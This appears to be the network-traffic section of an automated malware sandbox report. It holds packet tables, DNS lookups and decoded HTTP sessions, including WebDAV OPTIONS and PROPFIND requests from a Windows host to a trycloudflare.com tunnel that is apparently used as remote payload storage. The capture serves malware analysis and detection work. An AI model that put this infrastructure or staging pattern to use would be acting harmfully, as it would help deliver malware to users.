            Mar 13, 2025 11:07:49.186281919 CET53106443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.186330080 CET44353106104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.186672926 CET44353106104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.196557045 CET53106443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.240339041 CET44353106104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.626172066 CET53111443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:49.628209114 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:49.628251076 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:49.628325939 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:49.631098032 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:49.631119967 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:49.668325901 CET44353111162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:49.730556011 CET44353106104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.730618000 CET44353106104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.730848074 CET53106443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.730876923 CET53106443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.898752928 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.898788929 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:49.898853064 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.899149895 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:49.899164915 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:50.895920992 CET44353111162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:50.895997047 CET53111443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.508589029 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:51.509007931 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.509040117 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:51.510118008 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:51.510186911 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.512375116 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.512449980 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:51.512618065 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.512629032 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:51.515645027 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:51.515734911 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:51.517788887 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:51.517802954 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:51.518038034 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:51.519007921 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:51.564323902 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:51.566586018 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:51.963444948 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.003988981 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.004015923 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.005769014 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.005856991 CET44353114162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.005917072 CET53114443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.100033998 CET44353119104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:52.100485086 CET53119443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.113590002 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.113631010 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:52.113717079 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.115245104 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.115309000 CET44353123162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.115380049 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.115742922 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.115763903 CET44353123162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.115839005 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.115853071 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:52.494330883 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.494370937 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:52.494640112 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.494934082 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:52.494946003 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:52.599814892 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.601079941 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.601123095 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.601272106 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.601794004 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:52.601819038 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:52.640332937 CET44353123162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:53.358973980 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:53.359015942 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:53.359325886 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:53.359708071 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:53.359720945 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:53.804408073 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:53.805006027 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:53.805032969 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:53.805818081 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:53.805833101 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.022058010 CET44353123162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.022207975 CET44353123162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.022285938 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.022317886 CET53123443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.196969986 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.197057962 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.198332071 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.198349953 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.198607922 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.199692965 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.240331888 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.328603983 CET49678443192.168.2.1020.189.173.26
            Mar 13, 2025 11:07:54.401705027 CET44353122104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.402019024 CET53122443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.404344082 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.404392004 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.404867887 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.405042887 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.405061007 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.494124889 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.494466066 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.494486094 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.494887114 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.495959044 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.496076107 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.496227980 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.536326885 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.789292097 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.789377928 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.789484978 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.789772034 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.789797068 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.789927006 CET53124443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.789932966 CET44353124104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.793256998 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.793301105 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.793431997 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.793538094 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:54.793548107 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:54.948529959 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.995707035 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.995719910 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.996332884 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:54.996690989 CET44353125162.159.134.42192.168.2.10
            Mar 13, 2025 11:07:54.996758938 CET53125443192.168.2.10162.159.134.42
            Mar 13, 2025 11:07:55.406740904 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:55.407078981 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:55.407105923 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:55.408181906 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:55.408262014 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:55.409334898 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:55.409396887 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:55.453504086 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:55.453521013 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:07:55.500390053 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:07:56.117930889 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.118704081 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.118725061 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.119565010 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.119570971 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.625679016 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.626172066 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.626188040 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.627679110 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.627685070 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.733468056 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.733598948 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:56.733695030 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.739012957 CET53130443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:56.739031076 CET44353130104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:57.253276110 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:57.253357887 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:57.253406048 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:57.255017042 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:57.255047083 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:07:57.255063057 CET53131443192.168.2.10104.16.230.132
            Mar 13, 2025 11:07:57.255068064 CET44353131104.16.230.132192.168.2.10
            Mar 13, 2025 11:08:05.221201897 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:05.221434116 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:05.221508980 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:05.252126932 CET53128443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:05.252155066 CET44353128142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:12.633152962 CET5273453192.168.2.101.1.1.1
            Mar 13, 2025 11:08:12.637928963 CET53527341.1.1.1192.168.2.10
            Mar 13, 2025 11:08:12.638092041 CET5273453192.168.2.101.1.1.1
            Mar 13, 2025 11:08:12.638160944 CET5273453192.168.2.101.1.1.1
            Mar 13, 2025 11:08:12.642834902 CET53527341.1.1.1192.168.2.10
            Mar 13, 2025 11:08:13.086221933 CET53527341.1.1.1192.168.2.10
            Mar 13, 2025 11:08:13.086570024 CET5273453192.168.2.101.1.1.1
            Mar 13, 2025 11:08:13.091514111 CET53527341.1.1.1192.168.2.10
            Mar 13, 2025 11:08:13.091608047 CET5273453192.168.2.101.1.1.1
            Mar 13, 2025 11:08:42.578937054 CET4969580192.168.2.10172.217.18.99
            Mar 13, 2025 11:08:42.583949089 CET8049695172.217.18.99192.168.2.10
            Mar 13, 2025 11:08:42.584044933 CET4969580192.168.2.10172.217.18.99
            Mar 13, 2025 11:08:53.409069061 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:53.409117937 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:53.409212112 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:53.409562111 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:53.409578085 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:55.430521011 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:55.431031942 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:55.431071043 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:55.431890965 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:55.432240009 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:08:55.432332039 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:08:55.485162020 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:09:05.084713936 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:09:05.084800959 CET44352738142.250.184.196192.168.2.10
            Mar 13, 2025 11:09:05.084887028 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:09:05.252485037 CET52738443192.168.2.10142.250.184.196
            Mar 13, 2025 11:09:05.252512932 CET44352738142.250.184.196192.168.2.10
            TimestampSource PortDest PortSource IPDest IP
            Mar 13, 2025 11:07:44.150882959 CET53539801.1.1.1192.168.2.10
            Mar 13, 2025 11:07:46.713171005 CET53618881.1.1.1192.168.2.10
            Mar 13, 2025 11:07:48.805550098 CET5268053192.168.2.101.1.1.1
            Mar 13, 2025 11:07:48.805704117 CET5037053192.168.2.101.1.1.1
            Mar 13, 2025 11:07:48.807960987 CET53575581.1.1.1192.168.2.10
            Mar 13, 2025 11:07:48.811693907 CET53645581.1.1.1192.168.2.10
            Mar 13, 2025 11:07:48.840538979 CET53526801.1.1.1192.168.2.10
            Mar 13, 2025 11:07:48.859407902 CET53503701.1.1.1192.168.2.10
            Mar 13, 2025 11:07:50.221019030 CET5250353192.168.2.101.1.1.1
            Mar 13, 2025 11:07:50.228823900 CET53525031.1.1.1192.168.2.10
            Mar 13, 2025 11:07:52.408047915 CET53636151.1.1.1192.168.2.10
            Mar 13, 2025 11:07:52.608371973 CET53564071.1.1.1192.168.2.10
            Mar 13, 2025 11:07:53.349658966 CET5331053192.168.2.101.1.1.1
            Mar 13, 2025 11:07:53.356321096 CET53533101.1.1.1192.168.2.10
            Mar 13, 2025 11:08:06.954575062 CET6548653192.168.2.101.1.1.1
            Mar 13, 2025 11:08:06.961447001 CET53654861.1.1.1192.168.2.10
            Mar 13, 2025 11:08:12.632685900 CET53511691.1.1.1192.168.2.10
            Mar 13, 2025 11:08:34.008462906 CET138138192.168.2.10192.168.2.255
            Mar 13, 2025 11:08:37.627535105 CET6379953192.168.2.101.1.1.1
            Mar 13, 2025 11:08:37.634371042 CET53637991.1.1.1192.168.2.10
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 13, 2025 11:07:48.805550098 CET192.168.2.101.1.1.10x808Standard query (0)www.healyconsultants.comA (IP address)IN (0x0001)false
            Mar 13, 2025 11:07:48.805704117 CET192.168.2.101.1.1.10xcb72Standard query (0)www.healyconsultants.com65IN (0x0001)false
            Mar 13, 2025 11:07:50.221019030 CET192.168.2.101.1.1.10xab61Standard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
            Mar 13, 2025 11:07:53.349658966 CET192.168.2.101.1.1.10x2040Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Mar 13, 2025 11:08:06.954575062 CET192.168.2.101.1.1.10x4ec4Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Mar 13, 2025 11:08:37.627535105 CET192.168.2.101.1.1.10xfbcbStandard query (0)www.google.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 13, 2025 11:07:48.840538979 CET1.1.1.1192.168.2.100x808No error (0)www.healyconsultants.comhealyconsultants.comCNAME (Canonical name)IN (0x0001)false
            Mar 13, 2025 11:07:48.840538979 CET1.1.1.1192.168.2.100x808No error (0)healyconsultants.com162.159.134.42A (IP address)IN (0x0001)false
            Mar 13, 2025 11:07:48.859407902 CET1.1.1.1192.168.2.100xcb72No error (0)www.healyconsultants.comhealyconsultants.comCNAME (Canonical name)IN (0x0001)false
            Mar 13, 2025 11:07:50.228823900 CET1.1.1.1192.168.2.100xab61Name error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
            Mar 13, 2025 11:07:53.356321096 CET1.1.1.1192.168.2.100x2040No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
            Mar 13, 2025 11:08:06.961447001 CET1.1.1.1192.168.2.100x4ec4No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
            Mar 13, 2025 11:08:37.634371042 CET1.1.1.1192.168.2.100xfbcbNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
            • typically-nut-personalized-syndication.trycloudflare.com
            • www.healyconsultants.com
            • c.pki.goog
            Session IDSource IPSource PortDestination IPDestination Port
            0192.168.2.1049695172.217.18.9980
            TimestampBytes transferredDirectionData
            Mar 13, 2025 11:07:41.069008112 CET202OUTGET /r/gsr1.crl HTTP/1.1
            Cache-Control: max-age = 3000
            Connection: Keep-Alive
            Accept: */*
            If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
            User-Agent: Microsoft-CryptoAPI/10.0
            Host: c.pki.goog
            Mar 13, 2025 11:07:41.702347040 CET223INHTTP/1.1 304 Not Modified
            Date: Thu, 13 Mar 2025 09:22:23 GMT
            Expires: Thu, 13 Mar 2025 10:12:23 GMT
            Age: 2718
            Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
            Cache-Control: public, max-age=3000
            Vary: Accept-Encoding
            Mar 13, 2025 11:07:41.706914902 CET200OUTGET /r/r4.crl HTTP/1.1
            Cache-Control: max-age = 3000
            Connection: Keep-Alive
            Accept: */*
            If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
            User-Agent: Microsoft-CryptoAPI/10.0
            Host: c.pki.goog
            Mar 13, 2025 11:07:41.904344082 CET223INHTTP/1.1 304 Not Modified
            Date: Thu, 13 Mar 2025 09:22:26 GMT
            Expires: Thu, 13 Mar 2025 10:12:26 GMT
            Age: 2715
            Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
            Cache-Control: public, max-age=3000
            Vary: Accept-Encoding


            Session IDSource IPSource PortDestination IPDestination Port
            0192.168.2.1049681104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:23 UTC145OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: DavClnt
            translate: f
            Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:24 UTC331INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 10:07:24 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91fab95dbcf747a3-DFW
            CF-Cache-Status: DYNAMIC
            Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
            dav: 1,2
            ms-author-via: DAV
            Server: cloudflare
            2025-03-13 10:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.1049682104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:29 UTC175OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
            translate: f
            Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:29 UTC331INHTTP/1.1 200 OK
            Date: Thu, 13 Mar 2025 10:07:29 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            CF-Ray: 91fab982ec4463bd-DFW
            CF-Cache-Status: DYNAMIC
            Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
            dav: 1,2
            ms-author-via: DAV
            Server: cloudflare
            2025-03-13 10:07:29 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.1049685104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:32 UTC205OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:33 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:32 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 782
            Connection: close
            CF-Ray: 91fab995ca6e6c5e-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:33 UTC782INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 39 54 31 30 3a 34 30 3a 31 37 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 31 33 35 31 35 38 37 32 36 36 35 36 3c 2f 44
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-19T10:40:17Z</D:creationdate><D:quota-used-bytes>135158726656</D


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.1049687104.16.230.132443
            TimestampBytes transferredDirectionData
            2025-03-13 10:07:34 UTC205OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
            2025-03-13 10:07:35 UTC228INHTTP/1.1 207 Multi-Status
            Date: Thu, 13 Mar 2025 10:07:35 GMT
            Content-Type: application/xml; charset=utf-8
            Content-Length: 782
            Connection: close
            CF-Ray: 91fab9a4bc99e909-DFW
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            2025-03-13 10:07:35 UTC782INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 39 54 31 30 3a 34 30 3a 31 37 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 31 33 35 31 35 38 37 32 36 36 35 36 3c 2f 44
            Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-19T10:40:17Z</D:creationdate><D:quota-used-bytes>135158726656</D


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.1049689104.16.230.132443
            TimestampBytes transferredDirectionData
